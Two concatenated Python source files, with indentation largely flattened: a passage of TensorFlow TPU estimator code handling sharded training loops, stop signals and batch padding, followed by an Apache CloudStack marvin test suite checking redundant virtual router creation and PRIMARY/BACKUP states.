device_assignment=ctx.device_assignment)
scaffold = _get_scaffold(captured_scaffold_fn)
return loss, host_calls, scaffold
def _train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
iterations_per_loop_var = _create_or_get_iterations_per_loop()
single_tpu_train_step, host_call, captured_scaffold_fn = (
model_fn_wrapper.convert_to_single_tpu_train_step(dequeue_fn))
def multi_tpu_train_steps_on_single_shard():
return training_loop.repeat(
iterations_per_loop_var,
single_tpu_train_step, [_INITIAL_LOSS])
(loss,) = tpu.shard(
multi_tpu_train_steps_on_single_shard,
inputs=[],
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
scaffold = _get_scaffold(captured_scaffold_fn)
return loss, host_call, scaffold
def _predict_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
num_cores = ctx.num_cores
single_tpu_predict_step, host_calls, captured_scaffold_fn = (
model_fn_wrapper.convert_to_single_tpu_predict_step(dequeue_fn))
def multi_tpu_predict_steps_on_single_shard():
def cond(scalar_stopping_signal):
return math_ops.logical_not(
_StopSignals.should_stop(scalar_stopping_signal))
inputs = [_StopSignals.NON_STOPPING_SIGNAL]
outputs = training_loop.while_loop(
cond, single_tpu_predict_step, inputs=inputs, name=b'loop')
return outputs
(dummy_predict_op,) = tpu.shard(
multi_tpu_predict_steps_on_single_shard,
inputs=[],
num_shards=num_cores,
outputs_from_all_shards=False)
scaffold = _get_scaffold(captured_scaffold_fn)
return dummy_predict_op, host_calls, scaffold
def _wrap_computation_in_while_loop(device, op_fn):
"""Wraps the ops generated by `op_fn` in tf.while_loop."""
def computation(i):
with ops.control_dependencies(op_fn()):
return i + 1
iterations_per_loop_var = _create_or_get_iterations_per_loop()
# By setting parallel_iterations=1, the parallel execution in while_loop is
# basically turned off.
with ops.device(device):
iterations = array_ops.identity(iterations_per_loop_var)
return control_flow_ops.while_loop(
lambda i: i < iterations,
computation, [constant_op.constant(0)],
parallel_iterations=1)
def _wrap_computation_in_while_loop_with_stopping_signals(device, op_fn):
"""Wraps the ops generated by `op_fn` in tf.while_loop."""
def cond(scalar_stopping_signal):
return math_ops.logical_not(
_StopSignals.should_stop(scalar_stopping_signal))
def computation(unused_scalar_stopping_signal):
return_value = op_fn()
execute_ops = return_value['ops']
signals = return_value['signals']
with ops.control_dependencies(execute_ops):
return _StopSignals.as_scalar_stopping_signal(signals)
# By setting parallel_iterations=1, the parallel execution in while_loop is
# basically turned off.
with ops.device(device):
return control_flow_ops.while_loop(
cond,
computation, [_StopSignals.NON_STOPPING_SIGNAL],
parallel_iterations=1)
def _validate_tpu_training_graph():
"""Validate graph before running distributed training.
Raises:
ValueError: If the graph seems invalid for running on device
"""
operations = ops.get_default_graph().get_operations()
# Check if there is at least one CrossReplicaSum operation in the graph.
# This should be introduced by using the CrossShardOptimizer wrapper.
cross_replica_sum_ops = [
o for o in operations if o.type == _CROSS_REPLICA_SUM_OP
]
if not cross_replica_sum_ops:
raise ValueError(
'CrossShardOptimizer must be used for model training on TPUs.')
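# Illustrative sketch (learning rate and optimizer choice are hypothetical):
# the check above passes when the train_op is built through the
# CrossShardOptimizer wrapper, which inserts the cross-replica gradient
# aggregation (CrossReplicaSum) into the graph.
#
#   optimizer = tf.contrib.tpu.CrossShardOptimizer(
#       tf.train.GradientDescentOptimizer(learning_rate=0.01))
#   train_op = optimizer.minimize(loss, global_step=tf.train.get_global_step())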
class _CapturedObject(object):
"""A placeholder to capture an object.
This is useful when we need to capture a Python object in a TensorFlow
control flow body function and use it outside the control flow.
"""
def __init__(self):
self._object = None
self._captured = False
def capture(self, o):
if self._captured:
raise RuntimeError(
'InternalError: Object can be captured only once. Please file a bug.')
self._captured = True
self._object = o
def get(self):
if not self._captured:
raise RuntimeError(
'InternalError: Object is not captured properly before `get`. '
'Please file a bug.')
return self._object
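# A minimal sketch (hypothetical helper, not used elsewhere in this module) of
# the capture/get protocol: the object is captured while the control-flow body
# is being built and is read back after the control flow has been constructed.
def _example_captured_object_sketch(build_body_fn):
  """Illustrative only: capture inside a body fn, read outside of it."""
  captured = _CapturedObject()
  def body():
    # Runs while the (TPU or while_loop) body is being traced/built.
    captured.capture({'note': 'captured during body construction'})
    return build_body_fn()
  result = body()
  return result, captured.get()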
def _get_scaffold(captured_scaffold_fn):
"""Retrieves the Scaffold from `captured_scaffold_fn`."""
with _CapturingContext(message='Inside scaffold_fn'):
scaffold_fn = captured_scaffold_fn.get()
if scaffold_fn:
scaffold = scaffold_fn()
if scaffold is None:
raise ValueError(
'TPUEstimatorSpec.scaffold_fn returns None, which is not allowed')
else:
scaffold = None
if scaffold:
wrapped_finalize = scaffold.finalize
def _finalize():
with _CapturingContext('Inside Scaffold.finalize'):
wrapped_finalize()
scaffold.finalize = _finalize
return scaffold
class _CapturingContext(control_flow_ops.ControlFlowContext):
"""Tracks references to Tensors defined in TPU replication."""
def __init__(self, message):
control_flow_ops.ControlFlowContext.__init__(self)
self._message = message
def AddOp(self, op): # pylint: disable=invalid-name
for c in op.inputs:
if tpu._TPU_REPLICATE_ATTR in c.op.node_def.attr: # pylint: disable=protected-access
raise ValueError('{}: Op {} depends on TPU computation {}, '
'which is not allowed.'.format(self._message, op, c))
def __enter__(self):
# pylint: disable=protected-access
self._g = ops.get_default_graph()
self._old = self._g._get_control_flow_context()
self._g._set_control_flow_context(self)
# pylint: enable=protected-access
def __exit__(self, _, __, ___): # pylint: disable=invalid-name
self._g._set_control_flow_context(self._old) # pylint: disable=protected-access
class _Inputs(object):
"""A data structure representing the input_fn returned values.
This also supports the returned value from input_fn as `Dataset`.
"""
def __init__(self, features=None, labels=None, dataset=None, signals=None):
if dataset is not None and (features is not None or labels is not None or
signals is not None):
raise RuntimeError('Internal Error: Either (features and labels) or '
'dataset should be provided, not both. Please file '
'a bug.')
self._features = features
self._labels = labels
self._signals = signals
self._dataset = dataset
self._iterator = None
@staticmethod
def from_input_fn(return_values):
"""Returns an `_Inputs` instance according to `input_fn` return value."""
if isinstance(return_values, dataset_ops.Dataset):
dataset = return_values
return _Inputs(dataset=dataset)
features, labels = _Inputs._parse_inputs(return_values)
return _Inputs(features, labels)
@staticmethod
def _parse_inputs(return_values):
if isinstance(return_values, tuple):
features, labels = return_values
else:
features, labels = return_values, None
return features, labels
@property
def is_dataset(self):
"""Returns True if the return value from input_fn is Dataset."""
return self._dataset is not None
def dataset_initializer_hook(self):
"""Returns a `SessionRunHook` to initialize this dataset.
This must be called before `features_and_labels`.
"""
iterator = self._dataset.make_initializable_iterator()
# pylint: disable=protected-access
hook = estimator_lib._DatasetInitializerHook(iterator)
self._iterator = iterator
return hook
def features_and_labels(self):
"""Gets `features` and `labels`."""
if self.is_dataset:
if self._iterator is None:
raise RuntimeError('Internal error: Must call dataset_initializer_hook '
'before calling features_and_labels(). Please file '
'a bug!')
return _Inputs._parse_inputs(self._iterator.get_next())
return (self._features, self._labels)
def signals(self):
return self._signals
@property
def dataset(self):
return self._dataset
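# A minimal sketch (hypothetical helper, not used elsewhere in this module)
# showing how the two supported input_fn return forms flow through _Inputs: a
# `Dataset` needs its initializer hook before features_and_labels() can be
# used, while a (features, labels) tuple or bare features is returned as-is.
def _example_inputs_sketch(input_fn_return_value):
  """Illustrative only: wraps an input_fn return value with _Inputs."""
  inputs = _Inputs.from_input_fn(input_fn_return_value)
  if inputs.is_dataset:
    hook = inputs.dataset_initializer_hook()  # must run before dequeuing
  else:
    hook = None
  features, labels = inputs.features_and_labels()
  return hook, features, labels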
class _InputsWithStoppingSignals(_Inputs):
"""Inputs with `_StopSignals` inserted into the dataset."""
def __init__(self, dataset, batch_size, add_padding=False):
assert dataset is not None
user_provided_dataset = dataset.map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=False, batch_size=batch_size, add_padding=add_padding))
final_batch_dataset = dataset.take(1).map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=True, batch_size=batch_size, add_padding=add_padding))
dataset = user_provided_dataset.concatenate(final_batch_dataset).prefetch(2)
super(_InputsWithStoppingSignals, self).__init__(dataset=dataset)
self._current_inputs = None
def features_and_labels(self):
if self._current_inputs is not None:
raise RuntimeError(
'Internal Error: The previous inputs have not been properly '
'consumed. First call features_and_labels, then call signals.')
inputs_with_signals = self._iterator.get_next()
features = inputs_with_signals['features']
labels = inputs_with_signals.get('labels')
self._current_inputs = inputs_with_signals
return features, labels
def signals(self):
"""Returns the `Signals` from `_Inputs`."""
if self._current_inputs is None:
raise RuntimeError(
'Internal Error: The current inputs have not been properly '
'generated. First call features_and_labels, then call signals.')
signals = self._current_inputs['signals']
self._current_inputs = None
return signals
@staticmethod
def insert_stopping_signal(stop, batch_size, add_padding=False):
"""Inserts stopping_signal into dataset via _map_fn.
Here we change the data structure in the dataset, such that the return value
is now a dictionary in which `features`, `labels`, and `signals` are three
distinct keys. This provides a better structure, which eases the process of
decomposing the inputs (see `features_and_labels`).
Args:
stop: bool, state of current stopping signals.
batch_size: int, batch size.
add_padding: bool, whether to pad the tensor to full batch size.
Returns:
A map_fn passed to dataset.map API.
"""
def _map_fn(*args):
"""The map fn to insert signals."""
if len(args) == 1:
# Unpack the single Tensor/dict argument as features. This is required
# when the input_fn returns no labels.
args = args[0]
features, labels = _Inputs._parse_inputs(args)
new_input_dict = {}
if add_padding:
padding_mask, features, labels = (
_PaddingSignals.pad_features_and_labels(
features, labels, batch_size))
new_input_dict['features'] = features
if labels is not None:
new_input_dict['labels'] = labels
else:
new_input_dict['features'] = features
if labels is not None:
new_input_dict['labels'] = labels
padding_mask = None
new_input_dict['signals'] = _StopSignals(
stop=stop, batch_size=batch_size, padding_mask=padding_mask).as_dict()
return new_input_dict
return _map_fn
class _StopSignals(object):
"""Signals class holding all logic to handle TPU stopping condition."""
NON_STOPPING_SIGNAL = False
STOPPING_SIGNAL = True
def __init__(self, stop, batch_size, padding_mask=None):
self._stop = stop
self._batch_size = batch_size
self._padding_mask = padding_mask
def as_dict(self):
"""Returns the signals as Python dict."""
shape = [self._batch_size, 1]
dtype = dtypes.bool
if self._stop:
stopping = array_ops.ones(shape=shape, dtype=dtype)
else:
stopping = array_ops.zeros(shape=shape, dtype=dtype)
signals = {'stopping': stopping}
if self._padding_mask is not None:
signals['padding_mask'] = self._padding_mask
return signals
@staticmethod
def as_scalar_stopping_signal(signals):
return array_ops.identity(signals['stopping'][0][0])
@staticmethod
def should_stop(scalar_stopping_signal):
if isinstance(scalar_stopping_signal, ops.Tensor):
# STOPPING_SIGNAL is a constant True. Here, the logical_and is just the TF
# way to express a bool check of whether scalar_stopping_signal is True.
return math_ops.logical_and(
scalar_stopping_signal, _StopSignals.STOPPING_SIGNAL)
else:
# For the non-Tensor case, it is used in a SessionRunHook, so we cannot
# modify the graph anymore. Here, we use pure Python.
return bool(scalar_stopping_signal)
class _PaddingSignals(object):
"""Signals class holding all logic to handle padding."""
@staticmethod
def pad_features_and_labels(features, labels, batch_size):
"""Pads out the batch dimension of features and labels."""
real_batch_size = array_ops.shape(
_PaddingSignals._find_any_tensor(features))[0]
batch_size_tensor = constant_op.constant(batch_size, dtypes.int32)
check_greater = check_ops.assert_greater_equal(
batch_size_tensor, real_batch_size,
data=(batch_size_tensor, real_batch_size),
message='The real batch size should not be greater than batch_size.')
with ops.control_dependencies([check_greater]):
missing_count = batch_size_tensor - real_batch_size
def pad_single_tensor(tensor):
"""Pads out the batch dimension of a tensor to the complete batch_size."""
rank = len(tensor.shape)
assert rank > 0
padding = array_ops.stack([[0, missing_count]] + [[0, 0]] * (rank - 1))
padded_shape = (batch_size,) + tuple(tensor.shape[1:])
padded_tensor = array_ops.pad(tensor, padding)
padded_tensor.set_shape(padded_shape)
return padded_tensor
def nest_pad(tensor_or_dict):
return nest.map_structure(pad_single_tensor, tensor_or_dict)
features = nest_pad(features)
if labels is not None:
labels = nest_pad(labels)
padding_mask = _PaddingSignals._padding_mask(
real_batch_size, missing_count, batch_size)
return padding_mask, features, labels
@staticmethod
def slice_tensor_or_dict(tensor_or_dict, signals):
"""Slice the real Tensors according to padding mask in signals."""
padding_mask = signals['padding_mask']
batch_size = array_ops.shape(padding_mask)[0]
def verify_batch_size(tensor):
check_batch_size = math_ops.equal(batch_size, tensor.shape[0])
with ops.control_dependencies([check_batch_size]):
return array_ops.identity(tensor)
def slice_single_tensor(tensor):
rank = len(tensor.shape)
assert rank > 0
real_batch_size = batch_size - math_ops.reduce_sum(padding_mask)
return verify_batch_size(tensor)[0:real_batch_size]
# As we split the Tensors across all TPU cores and concat them back, it is
# important to ensure the real data is placed before the padded data, i.e.,
# order is preserved. Given that, the sliced padding mask should be all 0's.
# If this assertion fails, the slice logic here would not hold.
sliced_padding_mask = slice_single_tensor(padding_mask)
assert_padding_mask = math_ops.equal(
math_ops.reduce_sum(sliced_padding_mask), 0)
with ops.control_dependencies([assert_padding_mask]):
should_stop = _StopSignals.should_stop(
_StopSignals.as_scalar_stopping_signal(signals))
is_full_batch = math_ops.equal(math_ops.reduce_sum(padding_mask), 0)
def slice_fn(tensor):
# If the current batch is a full batch or is part of the stopping signals,
# we do not need to slice, to save performance.
return control_flow_ops.cond(
math_ops.logical_or(should_stop, is_full_batch),
(lambda: verify_batch_size(tensor)),
(lambda: slice_single_tensor(tensor)))
return nest.map_structure(slice_fn, tensor_or_dict)
@staticmethod
def _find_any_tensor(batch_features):
tensors = [x for x in nest.flatten(batch_features)
if isinstance(x, ops.Tensor)]
if not tensors:
raise ValueError('Cannot find any Tensor in features dict.')
return tensors[0]
@staticmethod
def _padding_mask(real_batch_size, missing_count, batch_size):
padding_mask = array_ops.concat(
[
array_ops.zeros((real_batch_size,), dtype=dtypes.int32),
array_ops.ones((missing_count,), dtype=dtypes.int32)
],
axis=0)
padding_mask.set_shape((batch_size,))
return padding_mask
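# A minimal sketch (sizes are hypothetical) of the mask layout produced by
# `_padding_mask` above: zeros mark real rows, ones mark padded rows, and real
# rows always come first, which is what `slice_tensor_or_dict` relies on.
def _example_padding_mask_sketch():
  """Illustrative only: real_batch_size=3, missing_count=5, batch_size=8."""
  # Expected value: [0, 0, 0, 1, 1, 1, 1, 1] with shape (8,).
  return np.concatenate([np.zeros((3,), dtype=np.int32),
                         np.ones((5,), dtype=np.int32)])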
class _SignalsHelper(object):
"""A general helper class to handle common signals manipulation."""
def __init__(self, signals):
self._signal_keys = []
for key in sorted(signals):
self._signal_keys.append(key)
@property
def num_signals(self):
return len(self._signal_keys)
def unflatten(self, tensor_list):
return dict(zip(self._signal_keys, tensor_list))
@staticmethod
def as_tensor_list(signals):
return [signals[key] for key in sorted(signals)]
def _verify_cross_hosts_transfer_size(tensor_dict, message):
total_size = 0
tensor_structure = {}
for key, tensor in tensor_dict.items():
shape = tensor.shape
size = np.product(shape) * tensor.dtype.size
tensor_structure[key] = shape
total_size += size
if total_size >= _ONE_GIGABYTE:
raise ValueError(
'{} The transfer size is larger than the protobuf limit. Please '
'consider using Tensors with smaller shapes or reducing the batch '
'size. Given:\n'
'{}'.format(message, '\n'.join([
' -- Key: {}, Shape: {}'.format(k, v)
for k, v in tensor_structure.items()])))
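# A minimal sketch (shape and dtype are hypothetical) of the accounting done
# by `_verify_cross_hosts_transfer_size` above: each Tensor contributes
# prod(shape) * dtype.size bytes, and the sum must stay under _ONE_GIGABYTE.
def _example_transfer_size_sketch():
  """Illustrative only: a float32 [1024, 1000] Tensor is roughly 3.9 MB."""
  return int(np.prod([1024, 1000])) * 4  # bytes; well under _ONE_GIGABYTE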
|
test_redundant_router.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from nose.plugins.attrib import attr
from marvin.lib.base import (Account,
Router,
NetworkOffering,
Network,
VirtualMachine,
ServiceOffering,
Host)
from marvin.lib.utils import cleanup_resources
from marvin.lib.common import (get_domain,
get_template,
get_zone,
get_process_status)
import time
import multiprocessing
# Import Local Modules
from marvin.cloudstackTestCase import cloudstackTestCase
class TestCreateRvRNetworkOffering(cloudstackTestCase):
@classmethod
def setUpClass(cls):
cls.testClient = super(
TestCreateRvRNetworkOffering,
cls).getClsTestClient()
cls.api_client = cls.testClient.getApiClient()
cls.testdata = cls.testClient.getParsedTestDataConfig()
# Get Zone, Domain and templates
cls.domain = get_domain(cls.api_client)
cls.zone = get_zone(cls.api_client, cls.testClient.getZoneForTests())
cls._cleanup = []
return
@classmethod
def tearDownClass(cls):
try:
# Cleanup resources used
cleanup_resources(cls.api_client, cls._cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
def setUp(self):
self.apiclient = self.testClient.getApiClient()
self.dbclient = self.testClient.getDbConnection()
self.cleanup = []
return
def tearDown(self):
try:
cleanup_resources(self.apiclient, self.cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
@attr(tags=["advanced", "advancedns", "ssh"])
def test_createRvRNetworkOffering(self):
"""Test create RvR supported network offering
"""
# Steps to validate
# 1. create a network offering
# - all services by VirtualRouter
# - enable RedundantRouter servicecapability
# 2. enable the network offering
# Validate the following
# 1. Redundant Router offering should be created successfully and
# listed in listNetworkOfferings response
# assert if RvR capability is enabled
self.debug("Creating network offering with redundant VR capability")
try:
network_offering = NetworkOffering.create(
self.apiclient,
self.testdata["nw_off_isolated_RVR"],
conservemode=True
)
except Exception as e:
self.fail("Create network offering failed! - %s" % e)
self.debug("Enabling network offering - %s" % network_offering.name)
# Enable Network offering
network_offering.update(self.apiclient, state='Enabled')
self.cleanup.append(network_offering)
self.debug("Checking if the network offering created successfully?")
network_offs = NetworkOffering.list(
self.apiclient,
id=network_offering.id,
listall=True
)
self.assertEqual(
isinstance(network_offs, list),
True,
"List network offering should not return empty response"
)
self.assertEqual(
len(network_offs),
1,
"List network off should have newly created network off"
)
for service in network_offs[0].service:
if service.name == 'SourceNat':
self.debug("Verifying SourceNat capabilites")
for capability in service.capability:
if capability.name == 'RedundantRouter':
self.assertTrue(capability.value == 'true')
self.debug("RedundantRouter is enabled")
return
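# A hypothetical sketch (keys abbreviated; the actual entry lives in the
# marvin test data config) of what makes "nw_off_isolated_RVR" a redundant-VR
# offering: services are provided by VirtualRouter and the SourceNat service
# advertises the RedundantRouter capability that the test above asserts on.
#
#   "nw_off_isolated_RVR": {
#       "name": "Isolated network offering with redundant VR",
#       "supportedservices": "Dhcp,Dns,SourceNat,PortForwarding,...",
#       "serviceCapabilityList": {
#           "SourceNat": {"RedundantRouter": "true"},
#       },
#   }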
class TestCreateRvRNetwork(cloudstackTestCase):
@classmethod
def setUpClass(cls):
cls.testClient = super(TestCreateRvRNetwork, cls).getClsTestClient()
cls.api_client = cls.testClient.getApiClient()
cls.testdata = cls.testClient.getParsedTestDataConfig()
# Get Zone, Domain and templates
cls.domain = get_domain(cls.api_client)
cls.zone = get_zone(cls.api_client, cls.testClient.getZoneForTests())
cls.template = get_template(
cls.api_client,
cls.zone.id,
cls.testdata["ostype"]
)
cls.testdata["small"]["zoneid"] = cls.zone.id
cls.testdata["small"]["template"] = cls.template.id
cls._cleanup = []
cls.service_offering = ServiceOffering.create(
cls.api_client,
cls.testdata["service_offering"]
)
cls._cleanup.append(cls.service_offering)
cls.network_offering = NetworkOffering.create(
cls.api_client,
cls.testdata["nw_off_isolated_RVR"],
conservemode=True
)
cls._cleanup.append(cls.network_offering)
# Enable Network offering
cls.network_offering.update(cls.api_client, state='Enabled')
return
@classmethod
def tearDownClass(cls):
try:
# Cleanup resources used
cleanup_resources(cls.api_client, cls._cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
def setUp(self):
self.apiclient = self.testClient.getApiClient()
self.dbclient = self.testClient.getDbConnection()
self.account = Account.create(
self.apiclient,
self.testdata["account"],
admin=True,
domainid=self.domain.id
)
self.cleanup = []
self.cleanup.insert(0, self.account)
return
def tearDown(self):
try:
cleanup_resources(self.apiclient, self.cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
@attr(tags=["advanced", "advancedns", "ssh"])
def test_createRvRNetwork(self):
"""Test create network with redundant routers
"""
# Validate the following:
# 1. listNetworkOfferings shows created offering
# 2. listNetworks should show created network in Allocated state
# 3. returns no Running routers in the network
# 4. listVirtualmachines shows VM in Running state
# 5. returns 2 routers
# - same public IP
# - same MAC address of public NIC
# - different guestip address
# - redundant state (PRIMARY or BACKUP)
# - same gateway for the public traffic
# 6. all routers, networks and user VMs are cleaned up
# Creating network using the network offering created
self.debug("Creating network with network offering: %s" %
self.network_offering.id)
network = Network.create(
self.apiclient,
self.testdata["network"],
accountid=self.account.name,
domainid=self.account.domainid,
networkofferingid=self.network_offering.id,
zoneid=self.zone.id
)
self.debug("Created network with ID: %s" % network.id)
networks = Network.list(
self.apiclient,
id=network.id,
listall=True
)
self.assertEqual(
isinstance(networks, list),
True,
"List networks should return a valid response for created network"
)
nw_response = networks[0]
self.debug("Network state: %s" % nw_response.state)
self.assertEqual(
nw_response.state,
"Allocated",
"The network should be in allocated state after creation"
)
self.debug("Listing routers for network: %s" % network.name)
routers = Router.list(
self.apiclient,
networkid=network.id,
listall=True
)
self.assertEqual(
routers,
None,
"Routers should not be spawned when network is in allocated state"
)
self.debug("Deploying VM in account: %s" % self.account.name)
# Spawn an instance in that network
VirtualMachine.create(
self.apiclient,
self.testdata["small"],
accountid=self.account.name,
domainid=self.account.domainid,
serviceofferingid=self.service_offering.id,
networkids=[str(network.id)]
)
self.debug("Deployed VM in network: %s" % network.id)
# wait for VR to update state
time.sleep(self.testdata["sleep"])
self.debug("Listing routers for network: %s" % network.name)
routers = Router.list(
self.apiclient,
networkid=network.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertEqual(
len(routers),
2,
"Length of the list router should be 2 (Backup & primary)"
)
if routers[0].redundantstate == 'PRIMARY':
primary_router = routers[0]
backup_router = routers[1]
else:
primary_router = routers[1]
backup_router = routers[0]
self.debug("Redundant states: %s, %s" % (
primary_router.redundantstate,
backup_router.redundantstate
))
self.assertEqual(
primary_router.publicip,
backup_router.publicip,
"Public Ip should be same for both(PRIMARY & BACKUP)"
)
self.assertEqual(
primary_router.redundantstate,
"PRIMARY",
"Redundant state of router should be PRIMARY"
)
self.assertEqual(
backup_router.redundantstate,
"BACKUP",
"Redundant state of router should be BACKUP"
)
self.assertNotEqual(
primary_router.guestipaddress,
backup_router.guestipaddress,
"Both (PRIMARY & BACKUP) routers should not have same guest IP"
)
self.assertNotEqual(
primary_router.guestmacaddress,
backup_router.guestmacaddress,
"Both (PRIMARY & BACKUP) routers should not have same guestMAC"
)
return
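# A minimal sketch (hypothetical helper, not used by the tests here) of an
# alternative to the fixed time.sleep() above: poll Router.list until both
# redundant routers are reported, reusing the same call the tests already make.
def wait_for_router_pair(apiclient, network_id, retries=10, interval=30):
    """Illustrative only: return the router list once both VRs show up."""
    for _ in range(retries):
        routers = Router.list(apiclient, networkid=network_id, listall=True)
        if isinstance(routers, list) and len(routers) == 2:
            return routers
        time.sleep(interval)
    raise AssertionError(
        "Expected 2 redundant routers for network %s" % network_id)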
class TestCreateRvRNetworkNonDefaultGuestCidr(cloudstackTestCase):
@classmethod
def setUpClass(cls):
cls.testClient = super(
TestCreateRvRNetworkNonDefaultGuestCidr,
cls).getClsTestClient()
cls.api_client = cls.testClient.getApiClient()
cls.testdata = cls.testClient.getParsedTestDataConfig()
# Get Zone, Domain and templates
cls.domain = get_domain(cls.api_client)
cls.zone = get_zone(cls.api_client, cls.testClient.getZoneForTests())
cls.template = get_template(
cls.api_client,
cls.zone.id,
cls.testdata["ostype"]
)
cls.testdata["small"]["zoneid"] = cls.zone.id
cls.testdata["small"]["template"] = cls.template.id
cls._cleanup = []
cls.service_offering = ServiceOffering.create(
cls.api_client,
cls.testdata["service_offering"]
)
cls._cleanup.append(cls.service_offering)
cls.network_offering = NetworkOffering.create(
cls.api_client,
cls.testdata["nw_off_isolated_RVR"],
conservemode=True
)
cls._cleanup.append(cls.network_offering)
# Enable Network offering
cls.network_offering.update(cls.api_client, state='Enabled')
return
@classmethod
def tearDownClass(cls):
try:
# Cleanup resources used
cleanup_resources(cls.api_client, cls._cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
def setUp(self):
self.apiclient = self.testClient.getApiClient()
self.dbclient = self.testClient.getDbConnection()
self.account = Account.create(
self.apiclient,
self.testdata["account"],
admin=True,
domainid=self.domain.id
)
self.cleanup = []
self.cleanup.insert(0, self.account)
return
def tearDown(self):
try:
cleanup_resources(self.apiclient, self.cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
@attr(tags=["advanced", "advancedns"])
def test_createRvRNetwork(self):
"""Test create network with non-default guest cidr with redundant routers
"""
# Validate the following:
# 1. listNetworkOfferings shows created offering
# 2. listNetworks should show created network in Allocated state
# - gw = 192.168.2.1 and cidr = 192.168.2.0/23
# 3. returns no Running routers in the network
# 4. listVirtualmachines shows VM in Running state
# 5. returns 2 routers
# - same public IP
# - same MAC address of public NIC
# - different guestip address
# - redundant state (PRIMARY or BACKUP)
# - same gateway for the public traffic
# 6. all routers, networks and user VMs are cleaned up
# Creating network using the network offering created
self.debug("Creating network with network offering: %s" %
self.network_offering.id)
network = Network.create(
self.apiclient,
self.testdata["network"],
accountid=self.account.name,
domainid=self.account.domainid,
networkofferingid=self.network_offering.id,
zoneid=self.zone.id,
netmask='255.255.254.0',
gateway='192.168.2.1'
)
self.debug("Created network with ID: %s" % network.id)
networks = Network.list(
self.apiclient,
id=network.id,
listall=True
)
self.assertEqual(
isinstance(networks, list),
True,
"List networks should return a valid response for created network"
)
nw_response = networks[0]
self.debug("Network state: %s" % nw_response.state)
self.assertEqual(
nw_response.state,
"Allocated",
"The network should be in allocated state after creation"
)
self.assertEqual(
nw_response.gateway,
'192.168.2.1',
"The gateway should be 192.168.2.1"
)
self.assertEqual(
nw_response.cidr,
'192.168.2.0/23',
"Guest cidr should be 192.168.2.0/23 but is %s" % nw_response.cidr
)
self.debug("Listing routers for network: %s" % network.name)
routers = Router.list(
self.apiclient,
networkid=network.id,
listall=True
)
self.assertEqual(
routers,
None,
"Routers should not be spawned when network is in allocated state"
)
self.debug("Deploying VM in account: %s" % self.account.name)
# Spawn an instance in that network
VirtualMachine.create(
self.apiclient,
self.testdata["small"],
accountid=self.account.name,
domainid=self.account.domainid,
serviceofferingid=self.service_offering.id,
networkids=[str(network.id)]
)
self.debug("Deployed VM in network: %s" % network.id)
# wait for VR to update state
time.sleep(self.testdata["sleep"])
self.debug("Listing routers for network: %s" % network.name)
routers = Router.list(
self.apiclient,
networkid=network.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertEqual(
len(routers),
2,
"Length of the list router should be 2 (Backup & Primary)"
)
if routers[0].redundantstate == 'PRIMARY':
primary_router = routers[0]
backup_router = routers[1]
else:
primary_router = routers[1]
backup_router = routers[0]
self.assertEqual(
primary_router.publicip,
backup_router.publicip,
"Public Ip should be same for both(PRIMARY & BACKUP)"
)
self.assertEqual(
primary_router.redundantstate,
"PRIMARY",
"Redundant state of router should be PRIMARY"
)
self.assertEqual(
backup_router.redundantstate,
"BACKUP",
"Redundant state of router should be BACKUP"
)
self.assertNotEqual(
primary_router.guestipaddress,
backup_router.guestipaddress,
"Both (PRIMARY & BACKUP) routers should not have same guest IP"
)
self.assertNotEqual(
primary_router.guestmacaddress,
backup_router.guestmacaddress,
"Both (PRIMARY & BACKUP) routers should not have same guestMAC"
)
return
class TestRVRInternals(cloudstackTestCase):
@classmethod
def setUpClass(cls):
cls.testClient = super(TestRVRInternals, cls).getClsTestClient()
cls.api_client = cls.testClient.getApiClient()
cls.testdata = cls.testClient.getParsedTestDataConfig()
# Get Zone, Domain and templates
cls.domain = get_domain(cls.api_client)
cls.zone = get_zone(cls.api_client, cls.testClient.getZoneForTests())
cls.template = get_template(
cls.api_client,
cls.zone.id,
cls.testdata["ostype"]
)
cls.testdata["small"]["zoneid"] = cls.zone.id
cls.testdata["small"]["template"] = cls.template.id
cls._cleanup = []
cls.service_offering = ServiceOffering.create(
cls.api_client,
cls.testdata["service_offering"]
)
cls._cleanup.append(cls.service_offering)
cls.network_offering = NetworkOffering.create(
cls.api_client,
cls.testdata["nw_off_isolated_RVR"],
conservemode=True
)
cls._cleanup.append(cls.network_offering)
# Enable Network offering
cls.network_offering.update(cls.api_client, state='Enabled')
return
@classmethod
def tearDownClass(cls):
try:
# Cleanup resources used
cleanup_resources(cls.api_client, cls._cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
def setUp(self):
self.apiclient = self.testClient.getApiClient()
self.hypervisor = self.testClient.getHypervisorInfo()
self.dbclient = self.testClient.getDbConnection()
self.account = Account.create(
self.apiclient,
self.testdata["account"],
admin=True,
domainid=self.domain.id
)
self.cleanup = []
self.cleanup.insert(0, self.account)
return
def tearDown(self):
try:
cleanup_resources(self.apiclient, self.cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
# @attr(tags=["advanced", "advancedns", "ssh"])
@attr(tags=["TODO"])
def test_redundantVR_internals(self):
"""Test redundant router internals
"""
